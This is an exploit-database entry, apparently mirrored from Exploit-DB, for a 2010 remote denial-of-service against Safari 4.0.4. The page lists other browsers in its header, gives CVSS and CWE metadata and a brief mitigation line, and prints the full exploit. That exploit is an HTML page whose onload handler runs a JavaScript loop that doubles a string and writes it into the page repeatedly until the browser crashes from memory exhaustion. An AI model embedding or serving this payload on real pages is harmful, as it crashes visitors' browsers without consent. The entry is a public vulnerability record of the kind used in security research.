header-logo
Suggest Exploit
vendor:
Safari
by:
599eme Man
7,5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Safari
Affected Version From: 4.0.4
Affected Version To: 4.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:apple:safari:4.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010

Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM)

This exploit uses a buffer overflow vulnerability to cause a denial of service in Safari 4.0.4. The exploit creates a buffer of 'A' characters and then uses a loop to write a large amount of data to the page. This causes the browser to crash.

Mitigation:

Upgrade to the latest version of Safari, or use a different browser.
Source

Exploit-DB raw data:

<!--
Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM)

Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1

Author : 599eme Man
Contact : flouf@live.fr

-->

<body onload="javascript:DoS();"></body>

<script>

function DoS() {

var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}

}

</script>

Navigation

Suggest Exploit

Services By CQR